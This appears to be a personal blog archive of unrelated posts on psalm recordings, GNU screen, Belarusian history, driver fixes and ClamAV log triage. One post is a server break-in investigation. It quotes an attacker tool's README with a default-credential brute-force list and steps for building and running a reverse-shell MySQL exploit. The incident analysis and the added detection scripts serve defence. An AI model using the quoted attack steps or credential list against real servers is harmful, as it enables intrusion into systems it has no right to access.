I have an idea to collect, if possible, all performances of the Psalms in the Orthodox Church. I'm not sure if I will be able to find all of them on the Internet. So far I could find the first 3, performed by church choirs and monasteries. Hopefully, if God blesses it, I will be able to make a list of all Psalms as sung by our brothers and sisters in Christ.
† Bigorski monastery † – Blessed is the man (Psalm 1) 2007
Romanian Orthodox Chant – Psalm 1,2,3 at Putna Monastery
PSALM 3 – ORTHODOX CHRISTIAN SONG (Sung by an Orthodox Christian
Fr. Yousef Asaad – Psalm 3 (Coptic Orthodox Church chant)
As a GNU / Linux user I have used the screen window manager to manage multiple SSH connections (all over one ssh connection) to a host for maybe the last 10 years. Though screen is generally popular, it is still possible some novice sysadmin has not used it or (I hope not) has never heard of it. For those who don't use GNU screen yet, give it a try; launch it within a (system bash, csh etc.) shell and then inside the main screen window launch multiple screen internal sessions by simultaneously pressing the keys CTRL + ALT + c .
Each CTRL + ALT + c makes screen open a new "Virtual Window (pty)" inside itself; the multiple screen sub-instances are kept in the memory of the main screen program. In a way, the Virtual Windows of screen are in logic very similar to the Apache webserver's parent and child processes.
Anyways to test screen type in console:
And press enter twice, it will launch under screen a new instance of your current logged in shell (if you logged in bash will open bash if zsh – zsh etc.)
Afterwards, you can open multiple Virtual Screens as I've mentioned with pressing CTRL + ALT + c. Moving between all open screen sessions is done with simultaneous press of:
CTRL + ALT + p – To move to previous screen Virtual Window Shell Session
CTRL + ALT + n – To move to next screen Virtual Window Session
The most useful of all screen functionality is DETACH. You can detach (like saving the state of) the current active GNU Screen session by pressing together:
CTRL + a + d – Detach current active GNU Screen session
Screen supports detaching multiple sessions (whether 2 or more screen sessions run with identical user credentials).
An example use of multiple detached screen sessions would be if you login via SSH with a certain user lets say user myuser and later detach by pressing CTRL + a + d after which open new session, you will get in shell message similar to:
[detached from 1549.pts-11.pcfreak]
The msg indicates new screen session is detached. Onwards run screen once again, for sake of test typing in same shell once again:
After screen loads its second session press again CTRL + a + d – to detach second active session, again you will get msg:
[detached from 15691.pts-0.pcfreak]
Next on you can use screen to list all active window sessions by issuing:
pcfreak:~$ screen -list
There are screens on:
        1549.pts-11.pcfreak     (10/27/2012 09:45:58 PM)        (Detached)
        15691.pts-0.pcfreak     (10/24/2012 02:50:06 PM)        (Detached)
2 Sockets in /var/run/screen/S-hipo.
To attach to detached active GNU screen session, use:
pcfreak:~$ screen -r PID_OF_SESSION
For example to attach to 1 listed screen session 1549:
pcfreak:~$ screen -r 1549
To attach to second one 15691:
pcfreak:~$ screen -r 15691
The -r switch stands for re-attach. The second part of the session name, like pts-11.pcfreak and pts-0.pcfreak in the above example, just indicates the hostname where screen was detached as well as the pty (pseudo tty number assigned to the detached session); the time included shows the exact time at which the main screen session was started, for instance for screen 1549 it is 10/27/2012 09:45:58 PM.
The "2 Sockets in /var/run/screen/S-hipo" line displays the directory location of the screen sockets. On each screen user's startup a separate directory is created in /var/run/screen; attaching and detaching of screens is done via a UNIX socket (fifo named pipe):
pcfreak:~$ ls
1549.pts-11.pcfreak| 15691.pts-0.pcfreak| byobu.reload-required*
pcfreak:~$ cd /var/run/screen/S-hipo
pcfreak:/var/run/screen/S-hipo$ file 1549.pts-11.pcfreak
1549.pts-11.pcfreak: fifo (named pipe)
Many people who still remember irc clients like BitchX and epic and the IRC times should remember, how well known and frequent people used to detach those progs or even detach eggdrops with specific TCL scripts inside separate screen sessions.
The most useful use of screen of course is to open multiple SSH sessions to different server nodes and keep permanently logged in on hosts by detaching the screen session.
I can think of 3 main advantages of using ssh inside single screen session:
1. At any time you can login to just one server instead of (for exmpl. 10 servers), and use this one server as a reference through which you can "stuntly" check statuses of all 10 hosts with no need to login 10 times via SSH or with a Putty client (if logging from Windows)
2. If you're using an unstable, often interrupted, let's say modem (dial up) line to connect to the Internet and you need to continue a previous SSH login that was cut off by the interrupted connection
3. You can save a lot of time and effort of typing passwords multiple times at ssh login prompts
Of course there are disadvantages too;
From a security point of view it is a weak practice to stay logged in to multiple servers via SSH from one single screen session. If someone sniffs the password of the user who started screen and attaches to the screen session, he is suddenly granted access to 10 more servers! Anyhow, for lazy people who believe they maintain high security policies, e.g.:
a. do not login to SSH sessions from Windows hosts
b. use some kind of UNIX / Linux / BSD based OS
c. login from a host used only by a single person etc. etc.,
keeping screen detached with multiple sshs might save you a lot of time; this is especially so if you have to login to the servers 10 times a day while changing location – let's say if you use a notebook and travel a lot.
GNU screen also understands some commands which can configure its shell prompt as well as the color gamma of the main and sub-screen (virtual) sessions. To have a screen shell prompt outline and blue color gamma as in the picture in the beginning of my post you can download and use my .screenrc as your ~/.screenrc i.e.:
In case you see some screens, like this you should use screen -wipe to cleanse socket pointing to already non-existing screen:
pcfreak:~$ screen -wipe
Screen has plenty of other command shortcuts, all of them starting with a key combination of CTRL + a + (some kbd letter)
CTRL + a + a – Does switch between first and last screen open windows
CTRL + a + H – Turns screen log on for active screen session
Ctrl + a + m – Turns (on/off) screen monitoring for activity of a screen shell (useful if you left kernel, openoffice or some huge app to compile)
CTRL +a + _ – Turns monitoring and reports outside of screen session if a running shell inside screen is not active for more than 30 seconds
CTRL +a + shift + S – Is very handy as it splits the screen between all logged in active screen sessions (Use control CTRL + a + tab to switch between split windows)
Ctrl + a + x – locks the screen, in the same fashion as Screen Lock is done inside a GUI environment GNOME, KDE etc. Once pressed it can be unlocked after you type in your user pass. This is very handy if you have to go to toilet and you don't want your colleague to snuff in your console 🙂
It is also possible to switch between screen sub-virtual windows using:
CTRL + a + (number starting from 0), e.g.:
CTRL + a + 0
CTRL + a + 1
CTRL + a + …
CTRL + a + 9
There are plenty of other helpful functionalities which you might want to look up in the manual (man screen) – check the manual section DEFAULT KEY BINDINGS
P. S. – Some of the screen keybindings do not work in gnome-terminal, konsole and other terminal clients which already have key bindings set to CTRL + a + whatever key. If that's the case you can change the screen assigned keybindings through .screenrc
If you google around you will find a dozen of tricks you can do with screen, since my only goal of this article
I've recently been interested in Belarusian History. I found a few very interesting videos on youtube, so I decided to share them with people who want to learn more about Slavonic Culture. Belarus is a Slavonic culture and the old Belarusian language dates back to Ancient Bulgarian traditions. Also the Belarusian Ancient language includes a lot of Slavonic Ancient Bulgarian words. As a Bulgarian it is very interesting to me too, the severe impact that our Great Bulgarian nation had on Slavonic Nations and Russians. Belarusians, both lingually and culturally, are very close to us Bulgarians. The Orthodox Christian faith which later spread in Belarusian lands has also been transferred from Bulgarian and Serbian lands to Belarus, after the pupils of Saint Cyril and Methodius spread the Slavonic alphabet in nowadays Romanian lands, Moldova and Belarus. The first video below, Belarus History in 5 minutes, has a genuine video and musical arrangement. It was quite interesting to me to find out the Belarusian people have a long known tradition in Musical Instruments and Folklore Music. Nowadays they also produce great Gothic Music, just like most of the celtic nations 🙂
History of Bulgarus in 5 minutes – Aristic short presentation lesson on Belarussian history
At first, there was nothing
now there’s a lot of everything
we have to thank God for that
He created our world in the freestyle genre
He said, "Budzma" (“So be it!”)
and Our Land appeared.
Ichthyosauri and other dragons…
in the beginning, we lived in the ocean
but then we left the bosom of the sea
and started to be called the Neuri.
From the earliest times
the Neuri could turn into wolves
that was a customary thing for them…
Žycien, Piarun, Dažboh, and Svaroh
our ancestors believed in heathen gods
but Christianity already knocked on the door.
Let’s know our roots! The Belarusians, the daring people!
In the year 862 of our era
the city of Polacak was mentioned for the first time
There, St. Safija Cathedral was built
(there’re only three such churches in the world)
Local Prince Usiaslau Caradziej
was a cool personage; Listen what I say!
St. Jefrasinnia lived in Polacak
the memory of her is cherished down the ages
The famous cross was made for her
(it wasn’t just super, it was marvelous)
but during WWII, it was lost
and now it’s our own grail
Let’s continue, let’s march ahead
The time of Grand Prince Mindouh came
and here we must remember that
Belarus was called Litva then
or rather – the Grand Principality of Litva
its coat of arms was Pahonia (pursuit)
it had a formidable army
Our capital Vilnia was founded by
Grand Prince Hiedymin
the legend says he had a dream about an iron wolf…
Wikipedia describes this event
Let’s know our roots!
The Belarusians, the daring people!
The year 1362
The sword is drawn; flags flutter in the wind…
In the Battle of Blue Waters
our army defeated three Khans of the Golden Horde
and the Grand Principality of Litva suddenly
became the largest country in Europe
Let’s continue, let’s march ahead.
Vitaut reigns in the Grand Principality
The Teutonic Order threatens us.
The Battle of Grunwald shows who’s right
Vitaut and Jahajla, King of Poland
junked the Crusaders like scrap metal
Francysk Skaryna was a tough guy
he went to study abroad
He was the first who printed the Bible
in the Old Belarusian language in Prague
Our warriors were tough men, too
they defeated the Moscow Army near Vorsa
in the year 1514
In the meantime, the Grand Principality of Litva
accepted its constitution – the Statute of the GPL 1588
In the Battle of Kircholm, we defeated the Swedish army
Apparently, you didn’t know this fact before.
Let’s know our roots!
In the city of Mahilou
7,000 invaders were killed in the fight
Who were these invaders? Well, these … from the East
representatives of the "brotherly" Russian nation
They were called Muscovites then.
And there’s already a new state
the Polish–Litvian Commonwealth
For some reason, it irritated all the neighbors
The three partitions of this Commonwealth
and we were divided between three states
The biggest part was occupied by Russia
It engendered discontent among the nobility
and Tadevus Kasciuska appears on the scene
It’s necessary to remember this name because
he was a great revolutionary
for liberty, equality and fraternity
he struggled even in the United States
but the Russian Tsar cast him into prison
Let’s know our roots!
During Napoleon’s war
the Belarusians fought with the Belarusians
and in 1863 there was a new rebellion
Kastus Kalinouski, a patriot of Belarus
and his peasant soldiers – "kasiniery"
struggled for independence
but he was caught and hanged in Vilnia
The world enters the 20th century
It’s necessary to revive our culture!
Bahusevic, Bahdanovic, Kupala and Kolas
Lastouski, Luckievic… Many people!
Dozens and dozens of outstanding names…
but the Red Revolution is approaching fast
Well, in the terror of the Revolution
a new state with a beautiful name was born
the Belarusian People’s Republic
We still celebrate the day it was proclaimed
But suddenly, out of the blue
another Republic was installed here
its name wasn’t romantic at all
Belarusian Soviet Socialist Republic.
The 1920s. We remember that time
Belarusianization is everywhere
Writers publish their excellent works
Viciebsk artists create their chefs-d’oeuvre…
This process was stopped
in the year 1937
the blood purge began.
After that, one more hell – WWII
There were invaders, there were partisans
the country was torn apart again…
The Belarusians fought with the Belarusians again
shedding each other’s blood
The war is over! No need to fight!
There’re cosmonauts flying in the sky
Maserau, it’s time for you to speak!
Piesniary, it’s time for you to sing!
Barys Kit, make your discoveries for NASA
and we keep living in our country
which name now is the Republic of Belarus
We’ve got our ensign and national emblem
we sing our songs and read our poems…
the year 1991…
Let’s know our roots!
The Belarusians, the daring people!
We stop here, but now it’s your time
All of you can write your own continuation…
Let’s know our roots!
The Belarusians, the daring people!
Let’s know our roots!
The Belarusians, the daring people!
Budzma viedac svoj rod!
Salony narod, Bielaruski narod!
History of Belarus Гісторыя Беларусі Historia Białorusi _ – 8 minutes video explaining in short Belarusian etymological roots
As my blog readers might know, I'm running Debian Squeeze on my notebook as a Desktop OS. Until some time ago I used to be a big fan of Epiphany, but lately I stopped using Epiphany so much because of its too frequent crashes while browsing a website that contains Flash. The problem of course is not in Epiphany itself but in Flash, but still, as this is really disturbing if someone works, I nowadays use only Firefox. I tried for a while to use IceWeasel, but the IceWeasel (Firefox) version is too old:
Thus I use a custom downloaded binary release from Firefox's website, the one distributed at the time of writing this post in the archive firefox-16.0.2.tar.bz2
One of the main advantages of installing the custom binary from Firefox's website is that it auto updates and I'm always running the latest Release on my Linux Desktop, something IceWeasel still doesn't do.
My current firefox version is:
hipo@noah:/opt/firefox$ /opt/firefox/firefox --version
Mozilla Firefox 16.0.2
All works fine with it, except two little things;
One is that the Firefox development team compiled the Browser to still use OSS and not the newer ALSA (Advanced Linux Sound Architecture) used by almost all programs – something that is unfortunately irreversible
Secondly (which is the reason to write this), the Firefox Linux version doesn't by default restore the websites open in browser tabs when it was closed! – e.g. session restore in this Firefox version is not working.
In Windows, Firefox usually asks while closing the whole browser if the user wants to Save Browser Session; on the Linux version this is not default behavior, maybe developers have to answer why?
I had to fix one old notebook computer, Acer Aspire model 5100 – 5023. The PC was preloaded with Windows 32 bit XP by someone but the drivers were not installed. I tried installing the drivers, downloading them from Acer.com's website drivers download section from here. However the PC in question, as it was written on the vendor sticker, was not 5100 but some kind of 5100 modification laptop. Some of the few differences between Acer Aspire 5100 and Acer Aspire 5023 are that 5100 is bundled with Camera and a TV Tuner, whereas 5100-5023 is without WebCam and TV Tuner.
The most important drivers I've downloaded from Acer.com's website were, for me, the Wireless Adapter drivers, because without internet on it, it takes time downloading drivers from my notebook and moving them via an USB stick … I've downloaded drivers for Wireless as provided by the website (Wireless_Atheros_184.108.40.206) but after installing them, though I didn't get any error and the drivers brought up the Wireless Adapter, somehow I couldn't connect to any wireless network protected with WPA2-PSK key (passphrase) encryption. The Windows XP installed by somebody before I received the laptop for repair was Service Pack 2 (SP2) and the latest stable Win XP is with SP3 as well as a bunch of updates after SP3, so updating Win XP SP2 to Win XP SP3 would have probably taken more time than a clean re-install. Besides that, the Computer did not have any information to backup as it was bundled with a fresh Win XP SP2, so formatting was not a problem either.
Thus I re-installed the OS, formatting with Quick Format and installing a clean latest Windows English XP SP3.
After re-installing it took me a while of pondering until I figured out what drivers I need to install. I knew for sure there might be a problem with the Wireless Adapter as on the previously installed WIN XP it did not work. So before proceeding to download everything for Acer Aspire 5100 from acer.com's website, I first used Everest 2.20 Home edition to check the exact PC hardware Vendors and consequently look for the correct WI-FI driver. Everest identified the Wireless Adapter as
so I looked on the Net for the driver. Actually there are some other brand notebooks which also come bundled with NE785H (i.e. Asus, HP). First I couldn't find correct driver for Acer and give a try installing a NE785H driver for Asus notebook this did not make the WI-FI work correctly, so after a further investigation I found Wireless NE785H 32 bit Windows XP driver for Acer laptops a mirror of is here
Two important notes to make here: I had a severe problem with the notebook touchscreen and for a long time I thought the TouchScreen device was not working because of an improperly installed driver (in the Drivers provided by Acer.com there are two drivers provided for two different TouchPad devices – Synaptics and Elantech). I tried installing them one by one and both together, but in any case the TouchScreen did not react but kept hanging – fixing it was as simple as pressing simultaneously FN + F7!
Also another obstacle, I've faced was with the Video Card the notebook is with Integrated ATI Radeon Xpress 1100 as visible in Everest, drivers. In list of drivers on acer.com's website there was not a VGA driver for XP? This was puzzling so I googled and found few ATI Radeon Xpress 1100 drivers for other notebook vendors just like with Wireless. Downloading and testing other vendors drivers seem to install well but inside Control Panel -> System (Device Properties) -> Peripherals Video Card was with yellow questionmark (not properly working) …
It took me a while to figure it out, but later it appeared that the Windows XP VGA drivers for Aspire 5100 – 5023 (ATI Radeon Xpress 1100) are there under the not so intuitive name Chipset_ATI_8.251.060427_XPx86.zip. Updating the improper driver inside System -> Peripherals -> Video Adapter with the one from the zip made the Video card finally work 🙂 With the rest of the PC hardware drivers there were no issues, I just had to install as usual all the rest from the vendor ZIPs:
This exact server has about 100 Gigabytes of data, all contained on one hard disk partition; thus the check up of all files took a few hours. clamav is relatively slow compared to DrWeb or nod32. But since I'm not in a hurry, plus we can't afford to spend some extra money to buy an AV just for one scan, I left it scanning in a separate screen session.
clamscan execution put some extra load on the server (which btw is used mainly for processing a multitude of SQL queries and provides some HTTP access to a few websites via Apache server). After the scan was completed I ended up with an enormous clamav log file, listing all scanned files:
I checked the file content in vim, but reviewing 119MB of log line by line is an unthinkable task, e.g.:
debian:~# du -hsc /var/log/clamav_scan.log
119M    /var/log/clamav_scan.log
119M    total
I did a quick review of clamav_scan.log and tailing it displays:
# tail -n 10 /var/log/clamav_scan.log
----------- SCAN SUMMARY -----------
Known viruses: 1270572
Engine version: 0.97.3
Scanned directories: 18927
Scanned files: 221445
Infected files: 44
Total errors: 287
Data scanned: 12457.43 MB
Data read: 97007.10 MB (ratio 0.13:1)
Time: 1842.362 sec (30 m 42 s)
Thus I needed a way to avoid reading the log screen by screen to see what was detected as Infected Files, and instead show only the infected files found by clamav.
Since cat-ing the log is worthless, it is much better to only do grep "found" clamd.log or, as in my case where the file is clamav_scan.log, do:
# grep -i 'found' /var/log/clamav_scan.log
/usr/share/clamav-testfiles/clam.bz2.zip: ClamAV-Test-File FOUND
/usr/share/clamav-testfiles/clam.d64.zip: ClamAV-Test-File FOUND
/usr/share/clamav-testfiles/clam.ppt: ClamAV-Test-File FOUND
/usr/share/clamav-testfiles/clam.tnef: ClamAV-Test-File FOUND
/usr/share/clamav-testfiles/clam-aspack.exe: ClamAV-Test-File FOUND
/usr/share/clamav-testfiles/clam.exe.rtf: ClamAV-Test-File FOUND
/usr/share/clamav-testfiles/clam.7z: ClamAV-Test-File FOUND
/usr/share/clamav-testfiles/clam_IScab_ext.exe: ClamAV-Test-File FOUND
/usr/share/clamav-testfiles/clam.odc.cpio: ClamAV-Test-File FOUND
/usr/share/clamav-testfiles/clam.newc.cpio: ClamAV-Test-File FOUND
/usr/share/clamav-testfiles/clam.pdf: ClamAV-Test-File FOUND
/usr/share/clamav-testfiles/clam-wwpack.exe: ClamAV-Test-File FOUND
/usr/share/clamav-testfiles/clam.ole.doc: ClamAV-Test-File FOUND
/usr/share/clamav-testfiles/clam.cab: ClamAV-Test-File FOUND
/usr/share/clamav-testfiles/clam-mew.exe: ClamAV-Test-File FOUND
/usr/share/clamav-testfiles/clam-petite.exe: ClamAV-Test-File FOUND
/usr/share/clamav-testfiles/clam.sis: ClamAV-Test-File FOUND
/usr/share/clamav-testfiles/clam-fsg.exe: ClamAV-Test-File FOUND
/usr/share/clamav-testfiles/clam.exe: ClamAV-Test-File FOUND
/usr/share/clamav-testfiles/clam_cache_emax.tgz: ClamAV-Test-File FOUND
/usr/share/clamav-testfiles/clam.exe.bz2: ClamAV-Test-File FOUND
/usr/share/clamav-testfiles/clam_ISmsi_int.exe: ClamAV-Test-File FOUND
/usr/share/clamav-testfiles/clam.exe.szdd: ClamAV-Test-File FOUND
/usr/share/clamav-testfiles/clam.chm: ClamAV-Test-File FOUND
/usr/share/clamav-testfiles/clam.arj: ClamAV-Test-File FOUND
/usr/share/clamav-testfiles/clam_IScab_int.exe: ClamAV-Test-File FOUND
/usr/share/clamav-testfiles/clam.ea05.exe: ClamAV-Test-File FOUND
/usr/share/clamav-testfiles/clam.tar.gz: ClamAV-Test-File FOUND
/usr/share/clamav-testfiles/clam.exe.html: ClamAV-Test-File FOUND
/usr/share/clamav-testfiles/clam.exe.binhex: ClamAV-Test-File FOUND
/usr/share/clamav-testfiles/clam.impl.zip: ClamAV-Test-File FOUND
/usr/share/clamav-testfiles/clam-upack.exe: ClamAV-Test-File FOUND
/usr/share/clamav-testfiles/clam.bin-be.cpio: ClamAV-Test-File FOUND
/usr/share/clamav-testfiles/clam.mail: ClamAV-Test-File FOUND
/usr/share/clamav-testfiles/clam.exe.mbox.uu: ClamAV-Test-File FOUND
/usr/share/clamav-testfiles/clam.zip: ClamAV-Test-File FOUND
/usr/share/clamav-testfiles/clam-nsis.exe: ClamAV-Test-File FOUND
/usr/share/clamav-testfiles/clam_ISmsi_ext.exe: ClamAV-Test-File FOUND
/usr/share/clamav-testfiles/clam-yc.exe: ClamAV-Test-File FOUND
/usr/share/clamav-testfiles/clam.bin-le.cpio: ClamAV-Test-File FOUND
/usr/share/clamav-testfiles/clam-upx.exe: ClamAV-Test-File FOUND
/usr/share/clamav-testfiles/clam-pespin.exe: ClamAV-Test-File FOUND
/usr/share/clamav-testfiles/clam.exe.mbox.base64: ClamAV-Test-File FOUND
/usr/share/clamav-testfiles/clam.ea06.exe: ClamAV-Test-File FOUND
Surprisingly all the "Infected" files turned out to be regular clamav test files (virus, spyware, badware test files – i.e. clamav just uses these files to check that its database definitions work okay). Thus the supposedly Infected files: 44 turned out to be just another false positive.
Actually this grepping, and the logging of all scanned files even though they're not infected, is completely useless. Thus it would have been much better if I had instead run clamscan with cmd options:
debian:~# clamscan -r /* --infected
I hope ppl reading this article won't repeat my "mistake". In the meantime, after this thing here, maybe it will be a good idea to schedule a clamscan of the whole file system every 2 weeks or 1 month to make sure someone hasn't uploaded some malicious PHPShell script, exploit or other unwanted stuff.
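The triage done by hand above (grep for FOUND, then notice that every hit is a ClamAV test sample) can be scripted. This is an added example, not code from the original post: the function names and the sample log are constructed, and the test-sample directory is the one seen in the grep output above.

```bash
#!/usr/bin/env bash
# Added example: triage a clamscan log without reading it line by line.

# Directory holding ClamAV's own test samples, as seen in the grep output above.
TESTFILE_DIR='/usr/share/clamav-testfiles/'

# Print "path<TAB>signature" for every "<path>: <signature> FOUND" line.
# The regex anchors on the last ": " so a path containing ": " still parses.
clam_detections() {
    awk 'match($0, /: [^ ]+ FOUND$/) {
        print substr($0, 1, RSTART - 1) "\t" substr($0, RSTART + 2, RLENGTH - 8)
    }' "$1"
}

# Detections outside the test-sample directory: the ones worth a human look.
clam_real_detections() {
    clam_detections "$1" | awk -F'\t' -v dir="$TESTFILE_DIR" 'index($1, dir) != 1'
}

# The count clamscan itself reports in its SCAN SUMMARY block.
clam_reported_count() {
    awk -F': *' '/^Infected files:/ { n = $2 } END { print n + 0 }' "$1"
}

# One-line verdict. If reported and parsed differ, the log is truncated or
# contains detection lines this parser did not recognise.
clam_triage() {
    reported=$(clam_reported_count "$1")
    parsed=$(clam_detections "$1" | awk 'END { print NR }')
    real=$(clam_real_detections "$1" | awk 'END { print NR }')
    printf 'reported=%d parsed=%d testfiles=%d real=%d\n' \
        "$reported" "$parsed" "$((parsed - real))" "$real"
}

# Constructed sample log (not real scan output): two test samples, one
# made-up detection in a web directory, and a shortened summary block.
write_sample_log() {
    cat > "$1" <<'EOF'
/etc/hostname: OK
/usr/share/clamav-testfiles/clam.exe: ClamAV-Test-File FOUND
/usr/share/clamav-testfiles/clam.zip: ClamAV-Test-File FOUND
/home/site_dir/www/upload/a: b.php: Constructed.Sample.Signature FOUND
/var/www/index.php: OK

----------- SCAN SUMMARY -----------
Infected files: 3
EOF
}

sample=$(mktemp)
write_sample_log "$sample"
clam_triage "$sample"            # counts: reported / parsed / test samples / real
clam_real_detections "$sample"   # only the line that needs attention
rm -f "$sample"
```

When clamscan is run with `--infected --log=FILE`, the log already holds only detections and the summary, so the same functions run over a much smaller file.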
I've noticed some kind of script kiddie somehow gained access to one of the servers I administrate. A MS-SQL Scanner tool called sslog was downloaded in tmp and run with root user credentials.
The cracked victim host is running Debian Linux Squeeze, and the last security update I made was a few months ago. Inside the /tmp/.a/ directory, I've found a 0day MS-SQL scanner called mysqljackpot. Maybe the tool is still a private exploit scanner because I couldn't find it anywhere on the Internet:
# ls -al /tmp/.a
total 52
drwxr-xr-x  5 root root  4096 Oct 29 01:10 ./
drwxrwxrwt 10 root root 36864 Oct 29 14:46 ../
drwxr-xr-x  3 root root  4096 Oct 27 21:46 mysqljackpot/
drwxr-xr-x  3 root root  4096 Oct 28 16:58 new/
drwxr-xr-x  3 root root  4096 Oct 29 12:48 pass-multe/
# ls -al /tmp/.a/new/
total 12
drwxr-xr-x 3 root root 4096 Oct 28 16:58 ./
drwxr-xr-x 5 root root 4096 Oct 29 01:10 ../
drwxr-xr-x 3 root root 4096 Oct 29 00:58 mysqljackpot/
After further investigations, I've realized ./sslog is actually a frontend scanner program (Synscan 5.02):
root@host:/tmp/.a/new/mysqljackpot/scanner# ./sslog
Synscan 5.02 (http://www.digit-labs.org/files/tools/synscan/)
by John Anderson , Neil Kettle .
./sslog: getuid(): UID or EUID of 0 required
As you see, in order to run, the scanner requires root superuser privileges.
mysqljackpot is actually a brute force tool, as explained in a file (README.mysql) found in its directory:
Here is content of README.mysql:
MySQL Login Scanner
By Kingcope
REQUIRES A FAST SCANSERVER!!! DONT TRY TO RUN THIS FROM A SLOW CONNECTION! ***
Scans for open mysql servers with the following credentials:
root <nopass>
root mysql
root root
admin <nopass>
admin admin
admin mysql
mysql <nopass>
mysql mysql
Runs on linux.
Requirements: mysql development libraries and headers
Compile (try one of the following depending on your system):
$ ./configure LIBS=-lmysqlclient
OR
$ ./configure LIBS="-L/usr/lib/mysql" -lmysqlclient
OR
$ ./configure LIBS="-L/usr/lib64/mysql" -lmysqlclient
OR
$ ./configure CFLAGS="-lmysqlclient"
3. Compile the reverse shell payload (this is required!) required because the connect back ip and port are hardcoded in the dll: use mingw on windows or wine change REVERSEIP and REVERSEPORT to suit your needs. If you change REVERSEPORT you have to change the port in mysqljackpot.c too (default port: 443). issue commands: set PATH=%PATH%;c:\MinGW\bin\ gcc -c payload.c gcc -shared -o payload.dll payload.o -lws2_32 copy the payload.dll into the mysqljackpot exploit folder
4. Run The Exploit ./mysqljackpot -u root -p "" -t 220.127.116.11 A valid database admin user and his password are required for the exploit to work properly. This exploit is especially useful when used in connection to a MySQL login scanner, see scanner/README.mysql inside this package. Be sure to have the firewall open on the desired reverse port on the attacking machine.
5. Enjoy your SYSTEM Shell!!!
Here is also the header from mysqljackpot.c mysql username brute force tool:
/* Oracle MySQL on Windows Remote SYSTEM Level Exploit zeroday
 * Copyright (C) 2012 Kingcope
 *
 * Thanks to danny.
 */
After thinking over the security breach I thought of a few scenarios on how the attacker entered and ran as root superuser. One is:
Cracker entered directly via SSH after somehow sniffing the root password.
However, after a review of the last cmd, I've concluded this case is not very likely, e.g.:
# last |grep -i root
did not find any logs of unusual root logins, neither does there seem to be any unusual activity with logins of other non-root users. Of course it is possible someone logged in as root and used some tool to clean his tracks, some kind of user log-cleaner tool like the one I've written in the past in bash; this doesn't seem very likely however. It seems the /tmp/.a/ directory was created by some amateur script kiddie; a professional one would create a somewhat smarter directory, for example one named with just a few empty spaces, i.e. would create it with, let's say:
# mkdir " "
instead of the so trivial
# mkdir /tmp/.a/
Also the name of the directory containing the script kiddie tool, /tmp/.a, is not selected intelligently, but just done in a hurry, hence I even assume /tmp/.a is created by some automated SK tool written in a hurry by some Romanian SK Cracker 🙂
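Both naming tricks mentioned above, a dot-prefixed directory such as /tmp/.a and a whitespace-only name such as " ", can be searched for in one pass. This is an added example, not the author's code: the function names and the allowlist of well-known X11/ICE socket directories are assumptions, and the demo tree is constructed.

```bash
#!/usr/bin/env bash
# Added example: flag directories in a world-writable location whose names
# are dot-prefixed (like /tmp/.a) or made only of whitespace (like " ").

# List such directories under ROOT (default /tmp), at most DEPTH levels down.
# The excluded names are the usual X11/ICE socket directories (assumed allowlist;
# extend it with whatever is legitimate on your own hosts).
find_hiding_dirs() {
    root=${1:-/tmp}
    depth=${2:-2}
    find "$root" -mindepth 1 -maxdepth "$depth" -type d \
        \( -name '.*' -o ! -name '*[![:space:]]*' \) \
        ! -name '.X11-unix' ! -name '.ICE-unix' ! -name '.font-unix' \
        ! -name '.XIM-unix' ! -name '.Test-unix' 2>/dev/null
}

# For each hit print the numeric owner and how many owner-executable files
# it contains. The path goes in [brackets] so a whitespace-only name is
# visible in the report. Names containing a newline are not handled.
report_hiding_dirs() {
    find_hiding_dirs "$@" | while IFS= read -r dir; do
        uid=$(ls -ldn "$dir" | awk '{ print $3 }')
        execs=$(find "$dir" -type f -perm -100 2>/dev/null | awk 'END { print NR }')
        printf 'uid=%s execs=%s path=[%s]\n' "$uid" "$execs" "$dir"
    done
}

# Constructed demo tree: two hiding-style names, one allowlisted name and
# one ordinary directory.
make_constructed_tree() {
    mkdir -p "$1/.a/tool" "$1/ " "$1/.X11-unix" "$1/sess_ok"
    printf '#!/bin/sh\n' > "$1/.a/tool/run"
    chmod 700 "$1/.a/tool/run"
}

demo_root=$(mktemp -d)
make_constructed_tree "$demo_root"
report_hiding_dirs "$demo_root"
rm -rf "$demo_root"
```

On a real host, a hit owned by uid 0 in /tmp with executables inside, as in the `ls -al /tmp/.a` listing earlier, is the combination that deserves immediate attention.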
On the host there was webmin and usermin running. So;
my second assumption was it could be someone sniffed a login password via encrypted SSL connection, whether the root logged in via webmin, or somehow exploited usermin (though I should say usermin (which listens by default on port number 20000)
TCP port 20000, on which usermin listens by default, is filtered by iptables rules for all hosts' incoming connections, whereas webmin logins are permitted only from a few IP addresses. Thus this scenario, though more possible than a direct SSH login with a sniffed root password, still seems to me not very probable.
Therefore as a third scenario (most likely what happened), I assume some of the PHP forms on the server or some other undefined PHP executable via Apache variable script was missing definition.
Actually I saw in /var/log/apache2/error.log plenty of recurring warnings of existing undefined variables:
[Mon Oct 29 16:30:43 2012] [error] [client 18.104.22.168] PHP Notice: Undefined variable: not_assign in /home/site_dir/www/modules/start.mod.php on line 121, referer: http://site-domain-name.com/start?qid=3&answered_id=4
[Mon Oct 29 16:30:43 2012] [error] [client 22.214.171.124] PHP Notice: Undefined variable: counter_cookie in /home/site_dir/www/modules/start.mod.php on line 130, referer: http://site-domain-name.com/start?qid=3&answered_id=4
[Mon Oct 29 16:30:43 2012] [error] [client 126.96.36.199] PHP Notice: Undefined variable: campaign_cukie in /home/site_dir/www/modules/start.mod.php on line 135, referer: http://site-domain-name.com/start?qid=3&answered_id=4
[Mon Oct 29 16:30:43 2012] [error] [client 188.8.131.52] PHP Notice: Undefined index: actions in /home/site_dir/www/counter/count.php on line 11, referer: http://site-domain-name/start?qid=3&answered_id=4
[Mon Oct 29 16:30:43 2012] [error] [client 184.108.40.206] PHP Notice: Undefined variable: flag2 in /home/site_dir/www/counter/count.php on line 52, referer: http://iqtest.bg/start?qid=3&answered_id=4
Taking this in consideration, I assume the attacker, entered the system finding about the undefined variables, defining them and somehow achieving access to the www-data Apache user shell, and through this shell running some 0day Linux kernel exploit to gain root access and download and install mysqljackpot exploit scanner tool.
Found HIDDEN PID: 4994 Found HIDDEN PID: 13374 Found HIDDEN PID: 14931 Found HIDDEN PID: 18292 Found HIDDEN PID: 19199 Found HIDDEN PID: 22651 [*]Starting scanning using brute force against PIDS with Threads
# grep -i xzibit /var/log/rkhunter.log
[16:52:48] Checking for Xzibit Rootkit...
[16:52:48] Xzibit Rootkit [ Not found ]
[16:52:56] Found string 'hdparm' in file '/etc/init.d/hdparm'. Possible rootkit: Xzibit Rootkit
[16:52:56] Found string 'hdparm' in file '/etc/init.d/.depend.boot'. Possible rootkit: Xzibit Rootkit
[16:53:01] Rootkit names : Xzibit Rootkit, Xzibit Rootkit
